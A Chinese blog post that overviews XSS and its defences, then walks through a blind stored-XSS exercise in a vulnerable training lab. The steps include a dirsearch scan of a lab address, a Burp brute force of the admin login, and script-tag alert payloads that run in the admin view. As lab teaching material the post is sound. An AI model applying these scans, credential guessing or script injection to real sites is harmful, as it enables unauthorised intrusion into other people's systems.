XSS(跨站脚本)概述
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:
1.反射性XSS;
2.存储型XSS;
3.DOM型XSS;
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。
XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。
因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的方式进行处理:
输入过滤:对输入进行过滤,不允许可能导致XSS攻击的字符输入;
输出转义:根据输出点的位置对输出到前端的内容进行适当转义;
你可以通过“Cross-Site Scripting”对应的测试栏目,来进一步的了解该漏洞。
提示
登录后台,看会发生啥?后台登录地址是/xssblind/admin_login.php
解法
随便输入一些数据,提交。什么也没有发生。
审查元素。
<div class="page-content">
<div id="xss_blind">
<p class="blindxss_tip">请在下面输入你对"锅盖头"这种发型的看法:</p>
<p class="blindxss_tip">我们将会随机抽出一名送出麻港一日游</p>
<form method="post">
<textarea class="content" name="content"></textarea><br>
<label>你的大名:</label><br>
<input class="name" type="text" name="name"><br>
<input type="submit" name="submit" value="提交">
</form>
<p>谢谢参与,阁下的看法我们已经收到!</p> </div>
</div>
用 dirsearch 扫描目录。
dirsearch -u http://172.17.149.214:8765/vul/xss/xssblind/
找到网站后台。
访问:
http://172.17.149.214:8765/vul/xss/xssblind/admin_login.php
用 Burp 暴力破解。
账号:admin
密码:123456
登录后台,看到刚刚发表的评论。
构造 payload:
2143<script>alert(1);</script>4231
1432<script>alert(2);</script>1423
提交。
回到后台,刷新页面,出现弹窗。
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。